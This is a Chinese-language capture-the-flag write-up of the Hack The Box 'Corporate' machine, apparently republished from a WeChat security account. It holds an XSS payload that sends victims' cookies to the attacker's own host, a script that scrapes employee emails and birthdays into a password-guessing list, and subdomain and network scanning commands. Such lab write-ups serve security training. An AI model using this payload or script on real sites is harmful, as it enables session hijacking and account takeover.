前言:有点小遗憾,赛季最后一台靶机了,太菜了,摆了,简单记一下,只get了user。
Scan
┌──(kali㉿kali)-[~/Desktop/htb/Corporate]
└─$ sudo nmap -p- --min-rate 10000 10.10.11.246
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 07:43 EST
Nmap scan report for 10.10.11.246
Host is up (0.67s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 40.26 seconds
子域
子域爆破
┌──(kali㉿kali)-[~/Desktop/htb/Corporate]
└─$ wfuzz -H "Host: FUZZ.corporate.htb" --hw 11 -c -z file,"/home/kali/wordlists/subdomains-top1million-5000.txt" http://corporate.htb/
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://corporate.htb/
Total requests: 4992
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000035: 200 38 L 175 W 1725 Ch "support"
000000287: 302 0 L 4 W 38 Ch "sso"
000000263: 403 7 L 9 W 159 Ch "git"
000000847: 302 0 L 4 W 32 Ch "people"
XSS
逛论坛看到一个xss的payload直接偷了
<a href="http://corporate.htb/<script+src='/vendor/analytics.min.js'></script><script+src='/assets/js/analytics.min.js?v=document.location=`http://10.10.14.51:8888/${document.cookie}`'</script>" id="send-message">
自己起个python服务,在聊天窗口获取到cookie
这里有cors,拿的cookie用于登陆people子域的
People
在people.corporate.htb获取另外一个vpn
VPN
┌──(kali㉿kali)-[~/Desktop/htb/Corporate]
└─$ nmap --iflist
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 08:21 EST
************************INTERFACES************************
DEV (SHORT) IP/MASK TYPE UP MTU MAC
lo (lo) 127.0.0.1/8 loopback up 65536
lo (lo) ::1/128 loopback up 65536
eth0 (eth0) 192.168.141.148/24 ethernet up 1500 00:0C:29:8F:3C:7E
eth0 (eth0) fe80::ef9f:8e93:2e6c:2f82/64 ethernet up 1500 00:0C:29:8F:3C:7E
docker0 (docker0) 172.17.0.1/16 ethernet up 1500 02:42:27:7F:7D:71
tun0 (tun0) 10.10.14.51/23 point2point up 1500
tun0 (tun0) fe80::9a24:40b8:dfbb:ab7/64 point2point up 1500
tun0 (tun0) dead:beef:2::1031/64 point2point up 1500
tun1 (tun1) 10.8.0.7/24 point2point up 1500
tun1 (tun1) fe80::8aa0:d8ea:1934:c42a/64 point2point up 1500
**************************ROUTES**************************
DST/MASK DEV METRIC GATEWAY
10.8.0.0/24 tun1 0
10.9.0.0/24 tun1 0 10.8.0.1
192.168.141.0/24 eth0 100
10.10.10.0/23 tun0 0 10.10.14.1
10.10.14.0/23 tun0 0
10.129.0.0/16 tun0 0 10.10.14.1
172.17.0.0/16 docker0 0
0.0.0.0/0 eth0 100 192.168.141.2
::1/128 lo 0
dead:beef:2::1031/128 tun0 0
fe80::8aa0:d8ea:1934:c42a/128 tun1 0
fe80::9a24:40b8:dfbb:ab7/128 tun0 0
fe80::ef9f:8e93:2e6c:2f82/128 eth0 0
dead:beef:2::/64 tun0 256
fe80::/64 tun0 256
fe80::/64 tun1 256
dead:beef::/64 tun0 1024
fe80::/64 eth0 1024
ff00::/8 eth0 256
ff00::/8 tun0 256
ff00::/8 tun1 256
nmap扫c段
┌──(kali㉿kali)-[~/Desktop/htb/Corporate]
└─$ sudo nmap -p- --min-rate 10000 10.8.0.0/24
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 08:21 EST
Warning: 10.8.0.1 giving up on port because retransmission cap hit (10).
Warning: 10.8.0.2 giving up on port because retransmission cap hit (10).
Warning: 10.8.0.3 giving up on port because retransmission cap hit (10).
Warning: 10.8.0.4 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.8.0.1
Host is up (0.33s latency).
Not shown: 64357 closed tcp ports (reset), 1170 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
389/tcp open ldap
636/tcp open ldapssl
2049/tcp open nfs
3004/tcp open csoftragent
3128/tcp open squid-http
8006/tcp open wpl-analytics
Nmap scan report for 10.8.0.2
Host is up (0.37s latency).
All 65535 scanned ports on 10.8.0.2 are in ignored states.
Not shown: 64425 closed tcp ports (reset), 1110 filtered tcp ports (no-response)
Nmap scan report for 10.8.0.3
Host is up (0.41s latency).
Not shown: 64338 closed tcp ports (reset), 1195 filtered tcp ports (no-response)
PORT STATE SERVICE
8006/tcp open wpl-analytics
8888/tcp open sun-answerbook
Nmap scan report for 10.8.0.4
Host is up (0.70s latency).
Not shown: 64497 closed tcp ports (reset), 1037 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
Nmap scan report for 10.8.0.7
Host is up (0.000012s latency).
All 65535 scanned ports on 10.8.0.7 are in ignored states.
Not shown: 65535 closed tcp ports (reset)
Nmap done: 256 IP addresses (5 hosts up) scanned in 149.27 seconds
┌──(kali㉿kali)-[~/Desktop/htb/Corporate]
└─$ sudo nmap -p- --min-rate 10000 10.9.0.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 08:24 EST
Warning: 10.9.0.4 giving up on port because retransmission cap hit (10).
Warning: 10.9.0.1 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.9.0.1
Host is up (0.29s latency).
Not shown: 64884 closed tcp ports (reset), 643 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
389/tcp open ldap
636/tcp open ldapssl
2049/tcp open nfs
3004/tcp open csoftragent
3128/tcp open squid-http
8006/tcp open wpl-analytics
Nmap scan report for 10.9.0.4
Host is up (0.29s latency).
Not shown: 65012 closed tcp ports (reset), 521 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
Nmap done: 256 IP addresses (2 hosts up) scanned in 47.83 seconds
sharing
看到有分享文件功能,这里重新xss一个cookie(因为不能分享给自己)
爆破后再看自己的sharing,可以看到一个pdf有密码策略。
写脚本配合msf或者hydra爆破:
import re
import requests
start = 5000
end = 6000
userpasswordlist_file = "userpasswordlist.txt"
custom_cookie = "CorporateSSO=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6NTA3NywibmFtZSI6IkNlY2VsaWEiLCJzdXJuYW1lIjoiV2VzdCIsImVtYWlsIjoiQ2VjZWxpYS5XZXN0QGNvcnBvcmF0ZS5odGIiLCJyb2xlcyI6WyJzYWxlcyJdLCJyZXF1aXJlQ3VycmVudFBhc3N3b3JkIjp0cnVlLCJpYXQiOjE3MDMzMTE2NjAsImV4cCI6MTcwMzM5ODA2MH0.0Y55Nhk8W5DKIHqbi3plxzBtwdAGq3C9x2Y9fhxdev8; session=eyJmbGFzaGVzIjp7ImluZm8iOltdLCJlcnJvciI6W10sInN1Y2Nlc3MiOltdfX0=; session.sig=UDEZUiAvbn45P9_AxzLVFkXELfM"
headers = {"Cookie": custom_cookie}
# 循环访问URL并匹配邮箱和生日日期
for i in range(start, end + 1):
url = f"http://people.corporate.htb/employee/{i}"
response = requests.get(url, headers=headers)
content = response.text
# 匹配邮箱并保存到userlist.txt
email_match = re.search(r'<a href="mailto:(.*?)">', content)
# 匹配生日日期并保存到password.txt
birthday_match = re.search(
r'<th scope="row">Birthday</th>s+<td>(.*?)</td>', content
)
if birthday_match and email_match:
email = email_match.group(1).split("@")[0]
birthday = birthday_match.group(1)
match = re.match(r"(d+)/(d+)/(d+)", birthday)
month = match.group(1)
day = match.group(2)
year = match.group(3)
birthday = day + month + year
with open(userpasswordlist_file, "a") as file:
file.write(email + " CorporateStarter" + birthday + "n")
ROOT
没能拿下root。
Season 3 over
原文始发于微信公众号(搁浅安全):HTB-Corporate(Insane)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论